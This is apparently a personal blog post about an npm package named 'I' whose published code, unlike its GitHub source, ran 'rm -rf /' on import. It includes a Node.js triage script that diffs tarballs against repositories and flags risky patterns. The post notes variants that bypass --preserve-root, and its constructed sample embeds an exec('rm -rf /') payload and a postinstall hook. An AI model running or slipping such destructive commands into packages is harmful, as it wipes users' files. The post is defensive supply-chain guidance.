Npm package - I

December 20, 2017

My latest side project has led to me finding an interesting npm package named I.

The package promises "Just import it and all your problems will go away!" and the linked code on GitHub seems innocent enough:

Code on GitHub

But viewed in RunKit, which loads the version actually published to npm rather than the repository, the code reveals a more sinister intention.

Code on RunKit

On import the published version of this package spawns a shell and runs rm -rf /. Luckily, on most Linux systems GNU coreutils' rm refuses to operate on / at all (the --preserve-root default, which only an explicit --no-preserve-root overrides), so the command fails before deleting anything. That guard is narrow, though: it only catches that exact argument, so a variant such as rm -rf /* or a different target path would run with whatever permissions the user installing the package has.

The package has since been unpublished from npm. Its metadata shows three releases on 1st April 2017, so I'm guessing this was a fairly nihilistic April Fools' joke.

This shows the need for care when choosing and using third-party modules from npm or other package repositories. In particular, the source linked from the package page is not necessarily what gets installed: the published tarball is a separate artifact, and it is that artifact, not the repository, which needs reviewing.
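As an added example (not code from the original post or from the package it describes), the following Node.js script shows one way to triage a published package before installing it: it diffs the published files against the repository files and flags code that imports child_process, spawns processes, runs a recursive delete, or registers install-time lifecycle scripts. The package contents are constructed inline to stand in for what npm pack would give you; the file names, contents and pattern list are assumptions made for the example.

```javascript
'use strict';

// Source-level patterns that warrant a closer look before a package is installed.
// These are an assumed starting list, not an exhaustive one.
const SUSPICIOUS_SOURCE = [
  { name: 'child_process import',
    re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  { name: 'process spawn',
    re: /\b(?:exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\(/ },
  { name: 'recursive delete', re: /\brm\s+-(?:rf|fr)\b/ },
  { name: 'dynamic code', re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
];

// package.json scripts that npm runs automatically during install/publish.
const LIFECYCLE_HOOKS = new Set([
  'preinstall', 'install', 'postinstall',
  'preuninstall', 'postuninstall', 'prepare', 'prepublish',
]);

// Scan one JavaScript file line by line and report every pattern hit.
function scanSource(path, text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    for (const { name, re } of SUSPICIOUS_SOURCE) {
      if (re.test(line)) {
        findings.push({ file: path, line: i + 1, issue: name, snippet: line.trim() });
      }
    }
  });
  return findings;
}

// Report lifecycle scripts in package.json; an unparseable manifest is itself a finding.
function scanManifest(text) {
  let pkg;
  try {
    pkg = JSON.parse(text);
  } catch (e) {
    return [{ file: 'package.json', line: 0, issue: 'unparseable manifest', snippet: e.message }];
  }
  const findings = [];
  for (const [hook, cmd] of Object.entries(pkg.scripts || {})) {
    if (LIFECYCLE_HOOKS.has(hook)) {
      findings.push({ file: 'package.json', line: 0, issue: `lifecycle script "${hook}"`, snippet: cmd });
    }
  }
  return findings;
}

// files: { relativePath: fileContents } as unpacked from the published tarball.
function triagePackage(files) {
  const findings = [];
  for (const [path, text] of Object.entries(files)) {
    if (path === 'package.json') findings.push(...scanManifest(text));
    else if (/\.(?:m?js|cjs)$/.test(path)) findings.push(...scanSource(path, text));
  }
  return findings;
}

// Compare the repository checkout against the published tarball; any difference
// means the linked source is not what will actually be installed.
function diffAgainstRepo(repoFiles, publishedFiles) {
  const changed = [];
  for (const [path, text] of Object.entries(publishedFiles)) {
    if (!(path in repoFiles)) changed.push({ file: path, status: 'only in published tarball' });
    else if (repoFiles[path] !== text) changed.push({ file: path, status: 'differs from repo' });
  }
  for (const path of Object.keys(repoFiles)) {
    if (!(path in publishedFiles)) changed.push({ file: path, status: 'missing from published tarball' });
  }
  return changed;
}

// Constructed sample (not the real package): an innocent-looking repo next to a
// published tarball that spawns rm -rf / on require and adds a postinstall hook.
const repoFiles = {
  'package.json': JSON.stringify({ name: 'i', version: '1.0.0', main: 'index.js' }),
  'index.js': "module.exports = function () {\n  return 'all your problems will go away';\n};\n",
};
const publishedFiles = {
  'package.json': JSON.stringify({ name: 'i', version: '1.0.0', main: 'index.js',
    scripts: { postinstall: 'node index.js' } }),
  'index.js': "const { exec } = require('child_process');\nexec('rm -rf /');\n"
    + "module.exports = function () {\n  return 'all your problems will go away';\n};\n",
};

console.log('Files differing from repo:', JSON.stringify(diffAgainstRepo(repoFiles, publishedFiles), null, 2));
console.log('Findings in published package:', JSON.stringify(triagePackage(publishedFiles), null, 2));
```

In practice you would feed it the output of npm pack for the version you are about to depend on rather than the constructed objects above; a clean repo scan paired with a non-empty diff is exactly the situation this post describes.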



Website and blog of Chester Burbidge